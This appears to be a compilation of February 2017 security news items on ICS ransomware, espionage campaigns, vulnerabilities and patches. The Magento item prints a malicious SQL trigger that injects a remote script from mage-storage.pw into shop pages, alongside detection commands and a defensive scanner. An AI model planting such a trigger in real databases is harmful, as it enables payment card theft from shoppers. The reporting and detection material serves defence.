GIT researchers created a proof-of-concept ransomware that, in a simulated environment, was able to gain control of a water treatment plant and threaten to shut off the entire water supply or poison the city's water by increasing the amount of chlorine in it.
Dubbed LogicLocker, the ransomware, presented at the 2017 RSA Conference in San Francisco, allowed researchers to alter Programmable Logic Controllers (PLCs) — the tiny computers that control critical Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) infrastructure, like power plants or water treatment facilities.
This, in turn, gave them the ability to shut valves, control the amount of chlorine in the water, and display false readouts.
Sounds scary, Right?
Fortunately, this has not happened yet, but researchers say this is only a matter of time.
The simulated attack by researchers was created to highlight how attackers could disrupt vital services which cater to our critical needs, like water management utilities, energy providers, escalator controllers, HVAC (heating, ventilation and air conditioning) systems, and other mechanical systems.
Over 1500 PLC Systems Open To Ransomware Attack

LogicLocker targets three types of PLCs that are exposed online and infects them to reprogram the tiny computer with a new password, locking the legitimate owners out and demanding ransom while holding the utility hostage.
If the owners pay, they get their control over the PLC back. But if not, the hackers could cause the water plant to malfunction or, worse, dump life-threatening amounts of chlorine into water supplies, potentially poisoning entire cities.
GIT researchers searched the internet for the two models of PLCs that they targeted during their experiment and found more than 1,500 PLCs that were exposed online.
"There are common misconceptions about what is connected to the internet," says researcher David Formby. "Operators may believe their systems are air-gapped and that there's no way to access the controllers, but these systems are often connected in some way."
Targeting industrial control and SCADA systems is not new; cybercriminals and nation-state actors have been doing this for years, with programs like Stuxnet, Flame, and Duqu, but ransomware will soon add a financial element to this type of cyber attack.
Therefore, it is inevitable that money-motivated criminals will soon target critical infrastructure directly. Additionally, nation-state actors could disguise their operations as ransomware campaigns.
So, it is high time for industrial control systems and SCADA operators to start adopting standard security practices like changing the PLCs' default passwords, limiting their connections by placing them behind a firewall, scanning their networks for potential threats, and installing intrusion monitoring systems.


Insecure Android Apps Expose Connected Cars

17.2.2017 securityweek Hacking

Researchers at Kaspersky Lab have analyzed several Android applications for connected cars and determined that most of them lack important security features, making it easier for hackers to unlock the vehicles.

Carmakers often provide mobile applications that allow owners to control various functions remotely, including locking and unlocking doors, starting the engine, locating the vehicle, obtaining service information, and controlling air conditioning.

Kaspersky has analyzed seven of the most popular connected car Android applications, which have been installed by millions of users. The applications have not been named, but the security firm has reported its findings to their developers.

Researchers tested the apps to determine if they can be abused to steal a car or incapacitate its systems. They also looked for various security mechanisms, such as the use of obfuscation to prevent reverse engineering, checking if the device is rooted, checking the integrity of the code, and ensuring that the legitimate GUI is displayed to the user (i.e. overlay protection).

All the tested applications can be used to unlock a vehicle’s door and some of them also allow the user to start the engine. However, the aforementioned security features are mostly missing from the apps – only one encrypts the username and password, and none of them use obfuscation, overlay protection, root detection or code integrity checks.

The lack of security mechanisms makes it easier for a piece of malware that has infected the Android device to take control of the smart car app. And while hijacking the application does not allow an attacker to drive away with the car, it does allow them to unlock it and disable its alarm, which can make it easier to steal.

Researchers said car apps should be as secure as online banking apps, but they believe these applications currently represent the weakest link.

In November, researchers at Norway-based security firm Promon demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android app. At the time, Tesla said the vulnerabilities exploited by the researchers were not specific to its products, and argued that once a smartphone is hacked, all the apps stored on it are compromised.

Kaspersky researchers agree, but they told SecurityWeek that certain security mechanisms can make exploitation more difficult, even if the attacker has root access to the device.

“If you store users' data in an encrypted storage (in addition to default Android secure storage which can be accessed by root-rights owner), if your app has a root-detection feature, if the code of the app is obfuscated and if it does a self-integrity check, it would be much-much harder for an attacker to break it and steal your users' private data or even get access to their cars' control,” the researchers said.


Many Ukrainian Organizations Targeted in Reconnaissance Operation

17.2.2017 securityweek Cyber

CyberX, a company that specializes in ICS security, has been monitoring a well-organized campaign that has targeted at least 70 entities with ties to Ukraine, including the country’s critical infrastructure.

The campaign, dubbed Operation BugDrop, has been underway since at least June 2016. It involves malware delivered via spear phishing emails and malicious macro-enabled Office documents.

The BugDrop malware is capable of collecting system information, passwords and other browser data, and audio from the microphone. It can also steal files from local, shared and USB drives, including documents, spreadsheets, presentations, archives, databases and text files.

Each of these capabilities is provided by a different module, but researchers determined that not all modules are deployed on every infected device. Based on its analysis, CyberX believes BugDrop is a reconnaissance operation and it could represent the first phase of a campaign with broader objectives.

The main module, which downloads the other components, is designed to upload the stolen data to a specified Dropbox account. Experts believe the malware uses Dropbox for exfiltration because the file sharing service is often not blocked or monitored by firewalls.

The malware also includes various anti-reverse engineering mechanisms, including checking for debuggers, virtual environments, Wireshark and Process Explorer. The malware also attempts to evade detection by using encrypted DLLs and a technique called reflective DLL injection, which had also been leveraged by BlackEnergy and Duqu.

CyberX said a majority of the targets of Operation BugDrop are located or have an interest in Ukraine, but the attackers have also targeted entities in Russia, Saudi Arabia and Austria. Many of the Ukrainian organizations are located in the self-proclaimed states of Donetsk and Luhansk.

The list of victims includes an international organization that monitors human rights, counter-terrorism, and cyberattacks on critical infrastructure in Ukraine; a firm specializing in remote monitoring systems for oil and gas pipeline infrastructure; an energy company that designs gas pipelines, electrical substations, and water supply plants; a Ukrainian newspaper; and a scientific research institute.

“The operation requires a massive back-end infrastructure to store, decrypt and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics,” CyberX said in its report.

Based on its sophistication, CyberX believes the campaign is likely run by a state-sponsored actor, but the company has not named any country.

The security firm noted that there are many similarities to Operation Groundbait, a campaign detailed by ESET in May 2016. Operation Groundbait also targeted organizations in Ukraine and it also leveraged modular malware to steal data. ESET determined that it could be the work of a politically-motivated group from within Ukraine, which led the company to classify it as cyber surveillance.

However, CyberX believes Operation BugDrop is more sophisticated. For instance, Dropbox was not used for exfiltration in Operation Groundbait, and BugDrop used legitimate free web hosting to store its malware, as opposed to Groundbait attackers which paid for their domains and IP addresses.

Furthermore, the malware used in BugDrop was compiled one month after ESET published its report. Experts believe the two campaigns are either not related or the attackers decided to change their tactics, techniques and procedures after their activities were exposed.


A new SQL malware Targets online shops running on Magento
17.2.2017 securityaffairs Virus

Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.
Security experts have discovered a new strain of malware that targets websites running the Magento eCommerce platform. The novelty is that this is the first malware that hides its code in the website’s database and is written entirely in SQL.

The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researcher Willem de Groot, who first analyzed the SQL malware discovered by Jeroen Boersma, explained that this is a significant evolution in the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”


The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database, searching for suspicious SQL triggers, for example ones containing admin, .js, script or < (HTML tags):

echo 'SHOW TRIGGERS' | n98-magerun db:console
Once the malicious trigger has been found, it can be deleted with a command like the following:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console
According to the expert, the SQL malware attack starts with a brute force attack on /rss/catalog/notifystock/ against an otherwise fully patched shop.

Below the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order`
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
UPDATE core_config_data
SET value = IF(
value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
value,
CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
)
WHERE path='design/head/includes'
OR path='design/footer/absolute_footer'
OR path='design/footer/copyright';

UPDATE cms_block
SET content= IF(
content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
content,
CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
);
END;
de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.
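As an added example (not code from de Groot's post or from the n98-magerun tool), a small Python scanner that applies the heuristics above to trigger definitions: it loads rows from information_schema.TRIGGERS over a DB-API connection (the fetch_triggers helper and its PyMySQL-style %s placeholder are assumptions), flags trigger bodies containing the markers, extracts the injected script URL, and emits the DROP TRIGGER statements. The stand-alone run uses constructed rows built from the trigger shown above rather than a live database.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Heuristics from the write-up: a trigger body that mentions "admin", ".js" or
# "script", or that contains "<" (an HTML tag), has no business in a Magento
# database and deserves a manual look.
SUSPICIOUS_MARKERS = ("admin", ".js", "script", "<")


@dataclass(frozen=True)
class TriggerRow:
    """One row as returned by information_schema.TRIGGERS (or SHOW TRIGGERS)."""
    schema: str
    name: str
    table: str
    event: str       # INSERT / UPDATE / DELETE
    timing: str      # BEFORE / AFTER
    statement: str   # the trigger body (ACTION_STATEMENT)


def fetch_triggers(conn, schema: str) -> List[TriggerRow]:
    """Load all triggers of one schema over a DB-API 2.0 connection (assumption:
    a driver such as PyMySQL that uses %s placeholders). Not used by the
    stand-alone run below, which works on constructed rows instead."""
    sql = (
        "SELECT TRIGGER_SCHEMA, TRIGGER_NAME, EVENT_OBJECT_TABLE, "
        "EVENT_MANIPULATION, ACTION_TIMING, ACTION_STATEMENT "
        "FROM information_schema.TRIGGERS WHERE TRIGGER_SCHEMA = %s"
    )
    cur = conn.cursor()
    cur.execute(sql, (schema,))
    return [TriggerRow(*row) for row in cur.fetchall()]


def scan_triggers(rows: Iterable[TriggerRow]) -> List[Tuple[TriggerRow, List[str]]]:
    """Return (row, matched_markers) for every trigger whose body hits a marker."""
    findings = []
    for row in rows:
        body = row.statement.lower()
        hits = [m for m in SUSPICIOUS_MARKERS if m in body]
        if hits:
            findings.append((row, hits))
    return findings


def extract_script_urls(statement: str) -> List[str]:
    """Pull the src of any <script> tag a trigger tries to inject (the loader URL)."""
    return sorted(set(re.findall(r'<script\s+src=["\']([^"\']+)["\']', statement, re.I)))


def drop_statements(findings) -> List[str]:
    """Remediation SQL in the form the write-up recommends (DROP TRIGGER ...)."""
    return [f"DROP TRIGGER `{row.schema}`.`{row.name}`;" for row, _ in findings]


# Constructed sample: the trigger body quoted in the write-up, plus a benign
# housekeeping trigger that must not be flagged.
MALICIOUS_BODY = """BEGIN
UPDATE core_config_data
SET value = IF(
value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
value,
CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
)
WHERE path='design/head/includes'
OR path='design/footer/absolute_footer'
OR path='design/footer/copyright';
UPDATE cms_block
SET content= IF(
content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
content,
CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
);
END"""

SAMPLE_ROWS = [
    TriggerRow("magento", "after_insert_order", "sales_flat_order", "INSERT", "AFTER",
               MALICIOUS_BODY),
    TriggerRow("magento", "touch_customer", "sales_flat_order", "INSERT", "AFTER",
               "BEGIN UPDATE customer_entity SET updated_at = NOW() "
               "WHERE entity_id = NEW.customer_id; END"),
]


def report(rows: Iterable[TriggerRow]) -> List[str]:
    """One line per finding (trigger, markers, injected URLs), then the DROP statements."""
    findings = scan_triggers(rows)
    lines = []
    for row, hits in findings:
        lines.append(f"{row.schema}.{row.name} ({row.timing} {row.event} ON {row.table}): "
                     f"markers={hits} urls={extract_script_urls(row.statement)}")
    lines.extend(drop_statements(findings))
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_ROWS):
        print(line)
```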


Ukraine blames Russia for new cyber attacks on its infrastructure
17.2.2017 securityaffairs Attack

Ukraine blames Russia for a new wave of cyber attacks on its infrastructure, including the power grid and financial system.
This week Ukraine accused Russia of cyber attacks against its critical infrastructure, including the power grid and financial systems. State-sponsored hackers used a new strain of malware that targets industrial processes; the malicious code looked like it was designed by the same threat actor behind the notorious BlackEnergy malware.

“Oleksandr Tkachuk, Ukraine’s security service chief of staff, said at a press conference that the attacks were orchestrated by the Russian security service with help from private software firms and criminal hackers, and looked like they were designed by the same people who created malware known as ‘BlackEnergy.'” reported the Reuters news Agency.

Tkachuk revealed that the malware used in the attacks was designed to attack specific industrial processes.

“As an example, he said that the code included modules that sought to harm equipment inside the electric grid,” Reuters reported.

“Russian hackers and infobots become an important tool of the aggression against our country,” Tkachuk said.

The Russian Government has repeatedly denied accusations from the Ukrainian authorities that blame Moscow for cyber attacks against its infrastructure. The number of cyber attacks rapidly increased following the 2014 Crimean crisis.

According to the Ukrainian Government, Russian hackers launched 6,500 cyber attacks against its network in November and December alone. Kiev blamed Russian hackers for the power outage it has suffered in December. Hackers also targeted the defense and finance ministries and the State Treasury.

“There is a global cyber war of Russia against (the) whole world,” President Petro Poroshenko told Reuters in an interview in January at the World Economic Forum in Davos.

Tkachuk explained that the cyber attacks leverage TeleBots to infect computers that control infrastructure.

In December 2016, researchers from security firm ESET discovered that the BlackEnergy hacker group that targeted the Ukrainian grid one year ago, now identified as TeleBots, is targeting Ukrainian banks.


On Wednesday, cyber security experts at CyberX announced the discovery of a separate cyber espionage campaign in Ukraine that had compromised more than 60 victims, including an energy ministry, a scientific research institute and a firm that designs remote monitoring systems for oil & gas pipelines.


Iranian hackers behind the Magic Hound campaign linked to Shamoon
17.2.2017 securityaffairs CyberSpy

Security researchers discovered a cyber espionage operation, dubbed the Magic Hound campaign, that is linked to Iran and the recent Shamoon 2 attacks.
Security experts at Palo Alto Networks have discovered a new cyber espionage campaign linked to Iran that targeted several organizations in the Middle East.

The espionage campaign, dubbed Magic Hound, dates back to at least mid-2016. Hackers targeted organizations in the energy, government, and technology industries; all the targets are located in or have an interest in Saudi Arabia.

The attackers leverage a wide range of custom tools and an open-source cross-platform remote access tool (RAT) dubbed Pupy for the Magic Hound campaign.

“According to the developer, PupyRAT is a “multi-platform (Windows, Linux, OSX, Android), multi-function RAT and post-exploitation tool mainly written in Python.” CTU™ analysis confirms that PupyRAT can give the threat actor full access to the victim’s system.” reads the analysis published by SecureWorks.

The arsenal of the threat actor includes different types of custom tools such as droppers, downloaders, executable loaders, document loaders and IRC bots.

“Unit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016 which we have named Magic Hound. This appears to be an attack campaign focused on espionage. Based upon our visibility it has primarily targeted organizations in the energy, government, and technology sectors that are either in or have business interests in Saudi Arabia.” reads the analysis published by PaloAlto Networks.

“Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters.”

The same campaign was also monitored by experts at SecureWorks that attributed it to a threat actor tracked as COBALT GYPSY that is associated with the Iranian government.

The attackers behind the Magic Hound used Word and Excel documents embedding malicious macros that were able to download and execute additional tools using PowerShell.

The bait files appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.

An interesting discovery made by the experts is that some of the domains used in the Magic Hound campaign were also uncovered by IBM X-Force researchers in the analysis of the Shamoon 2 attack chain.

According to the experts at Palo Alto Networks an IRC bot used in the Magic Hound campaign is very similar to a piece of malware used by Newscaster, aka Charming Kitten and NewsBeef, an Iranian actor that targeted individuals in the U.S., Israel and other countries using fake social media profiles.

Iranian hackers appear very active in this period; both the Charming Kitten and Rocket Kitten actors were mentioned in an analysis of MacDownloader, a piece of malware used to exfiltrate data from Mac computers.


A Simple JavaScript Exploit Bypasses ASLR Protection On 22 CPU Architectures
16.2.2017 thehackernews Attack
Security researchers have discovered a chip flaw that could nullify hacking protections for millions of devices regardless of their operating system or the applications running on them, and what's worse — the flaw cannot be entirely fixed with any mere software update.
The vulnerability resides in the way the memory management unit (MMU), a component of many CPUs, works, and it allows bypassing the Address Space Layout Randomization (ASLR) protection.
ASLR is a crucial security defense deployed by all modern operating systems from Windows and Linux to macOS, Android, and the BSDs.
In general, ASLR is a memory protection mechanism which randomizes the location where programs run in a device's memory. This, in turn, makes it difficult for attackers to execute malicious payloads in specific spots in memory when exploiting buffer overflows or similar bugs.
In short, for attackers, it's like an attempt to burglarize a house blindfolded.
But now a group of researchers from the VUSec group at the Vrije Universiteit Amsterdam in the Netherlands have developed an attack that bypasses ASLR on at least 22 processor micro-architectures from vendors including Intel, AMD, ARM, Allwinner and Nvidia.
The attack, dubbed ASLR Cache or AnC, is particularly serious because it uses plain JavaScript to identify the base addresses at which system and application components are loaded in memory.
Merely visiting a malicious site can therefore trigger it, and the recovered addresses let an attacker aim follow-up attacks at the right regions of memory to steal sensitive information from the PC.
Here's how the attack works:
The attack exploits the way the processor and memory interact with each other.
The MMU, present in desktop, mobile and server chips, translates the virtual addresses a program uses into physical memory locations, and to do so it constantly reads a hierarchical directory called the page table.
To keep this translation fast, the page table entries read during a walk are held in the CPU's caches. Those caches are shared with untrusted applications, including the browser.
A piece of JavaScript running on a malicious website can therefore evict cache lines and time how long the MMU's page table walk takes afterwards (a cache side-channel attack), which reveals which cache lines the walk touched and thus where software components, such as libraries and memory-mapped files, are located in virtual memory.
With these locations in hand, an attacker who also has a memory corruption bug can read portions of the computer's memory and use them to launch more complex exploits, escalate privileges over the whole operating system and hijack the machine.
The researchers ran the AnC JavaScript attack in up-to-date Chrome and Firefox browsers on 22 different CPU micro-architectures and de-randomized ASLR in about 90 seconds, despite the side-channel countermeasures built into those browsers, such as reduced-resolution JavaScript timers.
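To make the leak concrete, here is an added illustration (not VUSec's AnC code) of the structural fact the attack relies on. It assumes the standard x86-64 four-level page table layout: 4 KiB pages, 8-byte entries, 512 entries per table page and 64-byte cache lines, so each line holds eight entries. For a given virtual address it computes which cache line of each table page the MMU touches during the walk. Because the line is selected by the upper six of the nine index bits at each level, an observer who sees only cache lines already learns 24 of the 36 randomized address bits; the remaining three bits per level only select the entry within a line. The code performs no timing measurement itself; it shows the address arithmetic that makes such a measurement informative.

```python
"""Added illustration (not VUSec's AnC code) of why a page-table walk leaks
address bits through the cache.  Assumes the standard x86-64 layout: 4 KiB
pages, 8-byte page-table entries, 512 entries per table page, 64-byte cache
lines (eight entries per line) and 48-bit canonical virtual addresses."""

PAGE_SHIFT = 12                      # bits 0..11 are the page offset
INDEX_BITS = 9                       # 512 entries per table page
ENTRY_SIZE = 8
LINE_SIZE = 64
ENTRIES_PER_LINE = LINE_SIZE // ENTRY_SIZE       # 8 entries per cache line
SLOT_BITS = ENTRIES_PER_LINE.bit_length() - 1    # 3 bits pick the entry in a line
LEVELS = ("PT", "PD", "PDPT", "PML4")            # level 1 (leaf) .. level 4 (root)
VADDR_BITS = 48


def walk(vaddr):
    """For each level, (name, table index, cache line within the table page,
    entry slot within that line).  The line is what a cache side channel can
    observe; the slot is hidden inside the line."""
    steps = []
    for level, name in enumerate(LEVELS, start=1):
        shift = PAGE_SHIFT + INDEX_BITS * (level - 1)
        index = (vaddr >> shift) & ((1 << INDEX_BITS) - 1)
        steps.append((name, index, index // ENTRIES_PER_LINE, index % ENTRIES_PER_LINE))
    return steps


def bits_revealed_by_lines():
    """Inclusive (low, high) virtual-address bit ranges that a line-granular
    observer learns: the upper six of the nine index bits at every level."""
    ranges = []
    for level in range(1, len(LEVELS) + 1):
        shift = PAGE_SHIFT + INDEX_BITS * (level - 1)
        ranges.append((shift + SLOT_BITS, shift + INDEX_BITS - 1))
    return ranges


def residual_entropy_bits():
    """Randomized address bits (above the page offset) still unknown after
    observing only cache lines: the slot bits, three per level."""
    revealed = sum(hi - lo + 1 for lo, hi in bits_revealed_by_lines())
    return VADDR_BITS - PAGE_SHIFT - revealed


def indistinguishable(a, b):
    """True when two addresses touch the same cache line at every level, so a
    line-granular observer cannot tell them apart."""
    return [s[2] for s in walk(a)] == [s[2] for s in walk(b)]


if __name__ == "__main__":
    target = 0x7F12_3456_7000          # a made-up library base, as an example
    for name, index, line, slot in walk(target):
        print(f"{name:4s} index={index:3d} line={line:2d} slot={slot}")
    print("bits revealed by cache lines:", bits_revealed_by_lines())
    print("residual entropy bits:", residual_entropy_bits())
```

The twelve residual bits are the ones AnC's paper recovers by probing neighbouring pages and watching when the touched line changes. The point the arithmetic makes is the one the researchers draw: the leak follows from how the walk indexes the cache, so no software update to the operating system or browser removes it.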
The VUSec research team has published two research papers [1, 2] detailing the AnC attack, along with two video demonstrations showing the attack running in a Firefox browser on a 64-bit Linux machine.
In their attack, the researchers combined their AnC JavaScript with attack code that exploits a now-patched use-after-free vulnerability (CVE-2013-0753) in Firefox. The AnC issues are tracked under several CVE identifiers, including:
CVE-2017-5925 for Intel processors
CVE-2017-5926 for AMD processors
CVE-2017-5927 for ARM processors
CVE-2017-5928 for a timing issue affecting multiple browsers
The VUSec team notified all the affected chipmakers and software firms, including Intel, AMD, Samsung, Nvidia, Microsoft, Apple, Google and Mozilla, more than three months ago, and only now went public with its findings.
"The conclusion is that such caching behavior and strong address space randomization are mutually exclusive," the paper concludes. "Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical."
"Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as the first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block."
According to the team, the only way end users can protect themselves against AnC attacks for now is to run a plug-in, such as NoScript for Firefox or ScriptSafe for Chrome, that blocks untrusted JavaScript on web pages from running in the browser.


Apple Patches Code Execution Flaw in GarageBand

16.2.2017 securityweek Vulnerebility

An update released this week by Apple for the music creation app GarageBand addresses a high severity vulnerability that can be exploited for arbitrary code execution.

The vulnerability, discovered by researchers at Cisco Talos and reported to Apple in mid-December, is an out-of-bounds write caused by the way saved files are parsed. An attacker can exploit the flaw by getting the targeted user to open a specially crafted GarageBand project file (.band).

“The format is broken into chunks with a specific length field for each,” explained Tyler Bohan, the Cisco Talos researcher who found the bug. “This length is controlled by the user and can be leveraged to expose an exploitable condition.”

Apple first attempted to patch the vulnerability, which it describes as a memory corruption issue, on January 18 with the release of GarageBand 10.1.5 for OS X and macOS.

However, researchers determined that the fix had been incomplete so Apple released GarageBand 10.1.6 on Monday in an effort to properly address the flaw.

The vulnerability also affects Apple’s Logic Pro X audio production suite. Apple claimed to have addressed the flaw in mid-January with the release of version 10.3.

The CVE identifiers assigned to this security hole are CVE-2017-2374 and CVE-2017-2372. Technical details are available in advisories published by Cisco Talos.

This is not the first time Talos researchers have found vulnerabilities in Apple software. In July 2016, they reported discovering several remote code execution vulnerabilities in iOS and OS X that could be exploited using specially crafted image files.


High Severity Flaw Patched in OpenSSL 1.1.0

16.2.2017 securityweek Vulnerebility

A high severity denial-of-service (DoS) vulnerability was patched on Thursday in OpenSSL with the release of version 1.1.0e.

The flaw, tracked as CVE-2017-3733, has been described as an “Encrypt-Then-Mac renegotiation crash.” The security hole, reported by Joe Orton of Red Hat on January 31, does not affect OpenSSL 1.0.2.

“During a renegotiation handshake if the Encrypt-Then-Mac extension is negotiated where it was not in the original handshake (or vice-versa) then this can cause OpenSSL to crash (dependent on ciphersuite). Both clients and servers are affected,” the OpenSSL Project said in its advisory.

The OpenSSL Project has once again reminded users that versions 1.0.1, 1.0.0 and 0.9.8 are not supported and they no longer receive security updates. Version 1.0.2 has a long term support (LTS) date of December 31, 2019, and there are no plans for a 1.0.3 release.

This is the second security update released this year. The first, released in late January, patched four low and moderate severity vulnerabilities.


Kaspersky unveils its own super-secure operating system

16.2.2017 SecurityWorld OS
Kaspersky Lab has introduced its own specialized operating system for embedded systems with strict cybersecurity requirements and for Internet of Things devices. According to the vendor, it significantly reduces the chance of hidden functionality appearing and minimizes the risk of a cyber attack.

The platform allows programs to perform only operations that can be verified. Applications will therefore have to be written in "traditional" code, comply with strict security rules and contain standard functionality. Only what is defined by those rules can be executed, including the functionality of the operating system itself.

This approach proved very time-consuming during the development of the operating system, but it offers clear advantages for application developers: the security policy can be designed alongside the given functionality.

Moreover, the policy can be tested immediately: a bug in the code means undocumented behaviour, which the operating system blocks. Above all, development of the security policy can be tailored to specific business goals: security can be built from the application's requirements rather than the other way around.

The solution also emphasizes widely used security principles such as Separation Kernel, Reference Monitor, Multiple Independent Levels of Security and the Flux Advanced Security Kernel architecture.

As for deployment, besides focusing on three key sectors (telecommunications, the automotive industry and heavy industry), the vendor is preparing a special package aimed at the financial sector (for example POS terminal security) and security hardening of critical operations for ordinary end-user Linux systems.

KasperskyOS is available in three versions, each with specific features: KasperskyOS, Secure Hypervisor and Security System. The first can be used as a foundation on which to build network routers, IP cameras or IoT controllers.

Secure Hypervisor can run applications under strict control of their mutual communication and can also be used for general security purposes (including secure operation of endpoint devices).

Finally, Security System brings strong security to traditional operating systems, embedded operating systems and real-time operating systems, with minimal additional developer effort.

The product, which the company says took 15 years to create, is available to OEM and ODM partners, system integrators and software developers.


Iranian Spies Target Saudi Arabia in "Magic Hound" Attacks

16.2.2017 securityweek CyberSpy

A cyber espionage operation linked to Iran and the recent Shamoon 2 attacks has targeted several organizations in the Middle East, particularly in Saudi Arabia.

Researchers at Palo Alto Networks have been monitoring the campaign, which dates back to at least mid-2016. Dubbed “Magic Hound,” the operation has been aimed at energy, government and technology sector organizations that are located or have an interest in Saudi Arabia.

The threat actor behind Magic Hound has used a wide range of custom tools and an open-source cross-platform remote access tool (RAT) named Pupy. While Palo Alto Networks has not attributed these attacks to any country, researchers at SecureWorks have also analyzed the campaign and they believe it is related to an actor which they track as COBALT GYPSY. SecureWorks is highly confident that COBALT GYPSY is associated with the Iranian government.

The Magic Hound attacks started with specially crafted macro-enabled Word and Excel documents set up to fetch additional tools using PowerShell. The malicious files appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.

The threat actor has used different types of custom tools to achieve its goals, including droppers, downloaders, executable loaders, document loaders and IRC bots. One of the payloads they delivered was the Python-based Pupy RAT.

It’s worth noting that some of the domains used in this attack and a link to the Pupy RAT were also uncovered by IBM X-Force researchers while trying to determine the initial entry point in the recent Shamoon 2 attacks. The initial breach vector, involving macro-enabled documents and PowerShell, is also similar.

Palo Alto Networks has found connections between the Magic Hound attacks and the Iran-linked threat group known as Rocket Kitten, which has targeted organizations in the Middle East and NATO countries. Furthermore, an IRC bot used in the Magic Hound campaign is very similar to a piece of malware used by Newscaster, aka Charming Kitten and NewsBeef, an Iranian actor known to target individuals in the U.S., Israel and other countries using fake social media personas.

The Charming Kitten and Rocket Kitten groups were also referenced recently in an analysis of MacDownloader, a piece of malware used by Iranian actors to steal data from Mac computers.


Google was aware of Russian APT28 group years before others
16.2.2017 securityweek APT

Lorenzo Bicchierai of Motherboard has shared an interesting private report on the Russian cyber espionage operations conducted by APT28; the document was written by Google, which never published it, and Motherboard obtained it from two independent sources.
The report, dating from 2014, includes information Google collected on the group's hacking activities.

In October 2014, the security experts at FireEye linked cyber attacks against a number of Eastern European countries to a Russian nation-state actor dubbed APT28.
The report published by FireEye revealed that the APT28 is behind long-running cyber espionage campaigns that targeted also US defense contractors, European security organizations and Eastern European government entities.

FireEye researchers collected evidence that the APT28 group is linked to the Russian Government, the team of hackers “does not appear to conduct widespread intellectual property theft for economic gain, but instead is focused on collecting intelligence that would be most useful to a government.”

“APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe,” FireEye reported.


The group focused its hacking campaign on targets that would be of interest to Russia, such as the Caucasus region with a focus on Georgia.

That was the beginning of the story; the same nation-state actor is now tracked under several names, including Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team.

Just a couple of days ago security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian cyberespionage group.

Before the publishing of the report in 2014, several companies were investigating the cyber attacks conducted by the threat actor, including Google of course.

According to Motherboard, Google “penned a 40-page technical report” on the activities of the APT28 group, a precious document considering that it has never been published before.

“This sort of document, which Motherboard obtained from two independent sources, may be a common sight in the threat intelligence industry, but the public rarely gets to see what such a report from Google looks like.” wrote Lorenzo Bicchierai. “The report draws from one of Google’s most interesting sources of data when it comes to malware and cybersecurity threats: VirusTotal, a public malware repository that the internet giant acquired in 2012.”
The document explicitly refers to two pieces of malware, Sofacy and X-Agent, which “are used by a sophisticated state-sponsored group targeting primarily former Soviet republics, NATO members, and other Western European countries.”

This means Google was aware of the threat years before its public disclosure: Google attributed the attacks to APT28 and linked them to the Russian government earlier than FireEye, ESET or CrowdStrike did.

“It looks like Google researchers were well aware of Sofacy before it was publicly disclosed.”

The title of the document is explicit, “Peering into the Aquarium,” and refers to the headquarters of the GRU military intelligence agency, popularly known as “The Aquarium.”

According to the report, the share of X-Agent and Sofacy submissions to VirusTotal by country shows that Georgia, Romania, Russia and Denmark had the highest ratios.


The experts from Google tried to profile APT28 and noticed that the group used the sophisticated X-Agent only to compromise “high-priority targets.” The nation-state actor made extensive use of the Sofacy malware for its broad campaigns; Sofacy was estimated to be three times more common than X-Agent in the wild.

“As a first-stage tool, Sofacy is used relatively indiscriminately against potential targets. X-Agent is reserved for high-priority targets. This is borne out by the data. VirusTotal submissions show that Sofacy was three times more common than X-Agent in the wild, with over 600 distinct samples in the data set.” states the report.

The report includes technical details about APT28 operations; it is interesting to note that Google's security team was able to identify the threat years before other security firms.


Yahoo Hacked Once Again! Quietly Warns Affected Users About New Attack
16.2.2017 thehackernews Attack

Has Yahoo rebuilt your trust again?
If yes, then you need to think once again, as the company is warning its users of another hack.
Last year, Yahoo admitted two of the largest data breaches on record. One of which that took place in 2013 disclosed personal details associated with more than 1 Billion Yahoo user accounts.
Well, it's happened yet again.
Yahoo sent out another round of notifications to its users on Wednesday, warning that their accounts may have been compromised as recently as last year, after an ongoing investigation turned up evidence that hackers had used forged cookies to log into accounts without passwords.
